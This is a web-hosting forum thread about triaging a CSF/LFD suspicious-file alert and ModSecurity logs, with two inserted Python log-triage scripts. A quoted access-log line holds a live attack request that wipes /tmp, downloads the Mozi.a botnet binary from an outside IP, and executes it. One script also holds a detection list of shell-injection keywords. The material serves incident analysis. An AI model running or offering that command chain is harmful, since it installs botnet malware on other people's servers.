Hack - Recommendations?

Migdiradmin

After I received a Suspicious File Alert from CSF/LFD:


Code:
Time:   Tue Dec xxxxx +0000
File:   /tmp/systemd-private-xxxxxxxxxxxxxxx-httpd.service-VdXVVS/tmp/xxxxxxxxxx-xxxxxNa
Reason: Linux Binary
Owner:  webapps:webapps (1000:1001)
Action: No action taken

And then, checking the logs around the same date:

Code:
[Tue Dec xxxxxxxxxxx] [:error] [pid 2671:tid 140425135249152] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "735"] [id "920350"] [msg "Host header is a numeric IP address"] [data "xxxxxxxxxxxxx"] [severity "WARNING"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "1xxxxxxxxxxxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]

[Tue Dec xxxxxxxx] [:error] [pid 2671:tid 140424433665792] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Multipart: Failed to delete file (part) "/tmp/xxxxxxxxxxxxxx-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa" because 1(Operation not permitted) [hostname "xxxxxxxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]



homedir log
Code:
457 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://74.68.65.171:50030/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"


Error log
Code:
[Tue Dec 21 22:09:25.830268 2021] [:error] [pid 2671:tid 140425135249152] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "735"] [id "920350"] [msg "Host header is a numeric IP address"] [data "xxxxxx"] [severity "WARNING"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "xxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]
[Tue Dec xxxxxxx] [:error] [pid 2671:tid 140424433665792] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Multipart: Failed to delete file (part) "/tmp/xxxxxxxxxx-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa" because 1(Operation not permitted) [hostname "xxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]


Any recommendations?
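The triage a practitioner would do on an alert like this can be scripted. The Python below is an added example, not code from the thread, from CSF or from ModSecurity: it parses ModSecurity 2.x error-log entries of the shape quoted above into fields, decodes the request from the homedir log and flags shell-injection markers, and matches the LFD-flagged temp file to the multipart upload part that ModSecurity logged as "Failed to delete". The sample lines are constructed to mirror the masked ones in the post: the Host-header value and the access-log client are TEST-NET placeholder addresses, the systemd-private id and the access-log timestamp are invented, and the multipart file name follows ModSecurity's `<date>-<time>-<unique_id>-file-XXXXXX` layout.

```python
"""Triage the ModSecurity and access-log entries quoted in the post above.

Added example (not from the thread, CSF or ModSecurity). Three checks:
  1. parse ModSecurity 2.x error-log entries into fields,
  2. decode access-log request lines and flag command-injection markers,
  3. match the LFD-flagged temp file to the multipart upload part that
     ModSecurity could not delete.  Sample lines below are constructed.
"""
import os
import re
from urllib.parse import unquote_plus

# --- constructed samples (IPs in Host/access log are TEST-NET placeholders) ---
MODSEC_LINES = [
    '[Tue Dec 21 22:09:25.830268 2021] [:error] [pid 2671:tid 140425135249152] '
    '[client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Access denied with '
    'code 406 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. '
    '[file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "735"] '
    '[id "920350"] [msg "Host header is a numeric IP address"] [data "203.0.113.10"] '
    '[severity "WARNING"] [ver "OWASP_CRS/3.3.2"] [tag "attack-protocol"] '
    '[hostname "203.0.113.10"] [uri "/tips/tipsSimulationUpload.action"] '
    '[unique_id "YcJQlczczxBoAwsDgDExowABfA0"]',
    '[Tue Dec 21 22:09:25.831104 2021] [:error] [pid 2671:tid 140424433665792] '
    '[client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Multipart: Failed to '
    'delete file (part) "/tmp/20211221-220925-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa" '
    'because 1(Operation not permitted) [hostname "203.0.113.10"] '
    '[uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]',
]
# What LFD reported: the same part, seen from the host through httpd's PrivateTmp.
LFD_PATH = ('/tmp/systemd-private-0123456789abcdef0123456789abcdef-httpd.service-VdXVVS'
            '/tmp/20211221-220925-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa')
# Combined-format access-log line; the post shows only the request part of it.
ACCESS_LINE = ('198.51.100.23 - - [21/Dec/2021:22:11:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;'
               'wget+http://74.68.65.171:50030/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" '
               '404 457 "-" "Hello, world"')

FIELD_RE = re.compile(r'\[([A-Za-z_]+) "((?:[^"\\]|\\.)*)"\]')
CLIENT_RE = re.compile(r'\[client ([0-9a-fA-F.:]+?)(?::(\d+))?\]')
MSG_RE = re.compile(r'ModSecurity: (.*?)(?= \[[a-z_]+ "|$)')
PART_RE = re.compile(r'Failed to delete file \(part\) "([^"]+)"')
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Strings that have no business in a URL once it is decoded the way a shell would see it.
INJECTION_MARKERS = (';', '|', '`', '$(', 'wget ', 'curl ', 'chmod 777', 'rm -rf', '/tmp/', '/bin/sh')


def parse_modsec(line):
    """Bracketed key/value fields plus client IP and the free-text message."""
    entry = dict(FIELD_RE.findall(line))          # repeated keys (tag) keep the last value
    m = CLIENT_RE.search(line)
    if m:
        entry['client'], entry['client_port'] = m.group(1), m.group(2)
    m = MSG_RE.search(line)
    entry['message'] = m.group(1).strip() if m else ''
    return entry


def blocked_requests(lines):
    """unique_id -> rule ids that denied it; one request can trip several rules."""
    hits = {}
    for entry in map(parse_modsec, lines):
        if entry['message'].startswith('Access denied') and 'id' in entry:
            hits.setdefault(entry.get('unique_id'), []).append(entry['id'])
    return hits


def injection_indicators(request_uri):
    """Decode + and %xx as the targeted CGI would, then list the markers present."""
    decoded = unquote_plus(request_uri)
    return [mk for mk in INJECTION_MARKERS if mk in decoded]


def scan_access_line(line):
    """(client, method, uri, status, indicators), or None if the line does not parse."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    client, _ts, method, uri, status, _size = m.groups()
    return client, method, uri, int(status), injection_indicators(uri)


def correlate_upload_part(lfd_path, modsec_lines):
    """Tie the LFD-flagged file to the request whose upload part ModSecurity could not remove.

    LFD walks the real filesystem and sees httpd's private /tmp as
    /tmp/systemd-private-<id>-httpd.service-XXXXXX/tmp/<name>; ModSecurity, inside
    the service's mount namespace, logs the same file as /tmp/<name>.
    """
    wanted = os.path.basename(lfd_path)
    for entry in map(parse_modsec, modsec_lines):
        m = PART_RE.search(entry['message'])
        if m and os.path.basename(m.group(1)) == wanted:
            return {'unique_id': entry.get('unique_id'), 'client': entry.get('client'),
                    'uri': entry.get('uri'), 'part': m.group(1)}
    return None


if __name__ == '__main__':
    print('denied:', blocked_requests(MODSEC_LINES))
    print('access:', scan_access_line(ACCESS_LINE))
    print('lfd file <-> request:', correlate_upload_part(LFD_PATH, MODSEC_LINES))
```

Run as a script it prints the three results. Two things it makes concrete: the LFD path is the host-side view of httpd's private /tmp, so a file ModSecurity logged as `/tmp/<name>` shows up to LFD under `/tmp/systemd-private-…-httpd.service-…/tmp/<name>`; and the `/shell?cd+/tmp;…` request only reads as a command chain after `+` and %xx decoding, so markers such as `chmod 777` or `rm -rf` are only visible in the decoded form.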
 
I don't see any hack yet, only attempts.

The first log entry is normal; I have CSF skip those. I've got those too, and they are present for all services:
Code:
drwx------  3 root root 4.0K 2021-12-01 23:18 systemd-private-2495xxxxxxxxxxxxxxxxxxxxxx144-httpd.service-011vFl
drwx------  3 root root 4.0K 2021-12-01 23:18 systemd-private-2495xxxxxxxxxxxxxxxxxxxxxx144-httpd.service-bwwUhF
I masked them with xxx because I don't know if that is important, but I got the same for mariadb and others there.

The second log contains some things like that shell thing, but that is the homedir log; my homedir.log is also full of this, and these are attempts.

It seems your ModSecurity is blocking things if I read the log correctly.
I would block that IP in CSF anyway.

But at this moment, I don't see a succeeded hack, only attempts.
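The systemd-private directories mentioned in the reply above are what systemd creates for units with PrivateTmp=yes. The Python below is an added example, not from the thread, CSF or systemd, that classifies the path in such an alert: offline it splits the path into unit, per-service directory and the name the service itself would see; on a host with systemctl it additionally confirms the unit is active with PrivateTmp=yes and that the per-service directory is root-owned 0700, as in the listing above. The layout it assumes, `/tmp/systemd-private-<128-bit id as hex>-<unit>-<6 random chars>/tmp/<file>` (and the same under /var/tmp), and the sample path are assumptions made for the example.

```python
"""Classify an LFD "Suspicious File Alert" path against systemd's PrivateTmp.

Added example, not from the thread, CSF or systemd. Assumed layout:
  /tmp/systemd-private-<128-bit id as hex>-<unit>-<6 random chars>/tmp/<file>
(and likewise under /var/tmp). The offline part parses the path; the live
checks run only where systemctl exists and are skipped otherwise.
"""
import os
import re
import shutil
import stat
import subprocess

PRIVATE_TMP_RE = re.compile(
    r'^(?P<dir>(?P<root>/(?:var/)?tmp)/systemd-private-(?P<id>[0-9a-f]{32})'
    r'-(?P<unit>[^/]+)-[A-Za-z0-9]{6})/tmp/(?P<name>.+)$')


def classify_path(path):
    """PrivateTmp components of PATH, or None when it is a plain /tmp file."""
    m = PRIVATE_TMP_RE.match(path)
    if not m:
        return None
    d = m.groupdict()
    # The same file as the service (and anything logging inside it) would name it.
    d['service_view'] = d['root'] + '/' + d['name']
    return d


def systemctl_property(unit, prop):
    """`systemctl show -p PROP --value UNIT`, or None if systemctl is not available."""
    if shutil.which('systemctl') is None:
        return None
    try:
        proc = subprocess.run(['systemctl', 'show', '-p', prop, '--value', unit],
                              capture_output=True, text=True, timeout=5, check=False)
    except (OSError, subprocess.SubprocessError):
        return None
    return proc.stdout.strip() or None


def private_dir_is_normal(private_dir):
    """True when the per-service dir is a root-owned 0700 directory, as in the listing above."""
    try:
        st = os.lstat(private_dir)
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and st.st_uid == 0 and stat.S_IMODE(st.st_mode) == 0o700


def triage(path, live=True):
    """Decide whether PATH is merely a PrivateTmp location or something to chase."""
    info = classify_path(path)
    if info is None:
        return {'path': path, 'verdict': 'plain /tmp drop: inspect the file itself'}
    report = dict(info, verdict='PrivateTmp path of %s; inspect %s as the service saw it'
                  % (info['unit'], info['service_view']))
    if live:
        report['active'] = systemctl_property(info['unit'], 'ActiveState')
        report['private_tmp'] = systemctl_property(info['unit'], 'PrivateTmp')
        report['dir_ok'] = private_dir_is_normal(info['dir'])
        if report['active'] is None:
            report['verdict'] += ' (no systemctl here: live checks skipped)'
        elif report['active'] != 'active':
            report['verdict'] = 'private dir of a unit that is not active: stale or planted, investigate'
        elif report['private_tmp'] != 'yes' or not report['dir_ok']:
            report['verdict'] = 'dir does not match a live PrivateTmp unit: investigate'
    return report


if __name__ == '__main__':
    # Constructed path shaped like the masked one in the alert (id and suffix invented).
    sample = ('/tmp/systemd-private-0123456789abcdef0123456789abcdef-httpd.service-VdXVVS'
              '/tmp/20211221-220925-upload-file-eLsTNa')
    for p in (sample, '/tmp/Mozi.a'):
        print(triage(p, live=False))
```

Whatever the verdict, the file inside still deserves a look (owner, size, `file(1)` type, mtime against the request time in the error log); the classification only tells you whether the location itself is expected. If you decide to have LFD skip these paths, the ignore list for its directory watching is /etc/csf/csf.fignore; check that file's own header for the pattern syntax your CSF version accepts before adding an entry.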
 
I already checked all logs and I think everything is OK.

I never had an email before with this LFD warning (Suspicious File Alert) for the:
/tmp/systemd-private-xxxxxxxx-httpd.service-V......

This is the first email, but if it is normal like you said, my blood pressure has now returned to normal :D

Thanks
 
Hello.
Yes, sometimes CSF does send out false alerts too, because often files in /tmp are suspicious.

But if you check the /tmp directory more often, you will see that there will often be systemd-private-xxx-some.service files in there.
However, when getting such notices, it's always wise to double-check, look at logs, etc.

You're welcome.
 
Yes, sometimes CSF does send out false alerts too, because often files in /tmp are suspicious.
Yes, sometimes updating apps from Nextcloud (the mail app, for example) triggers false CSF alerts.
 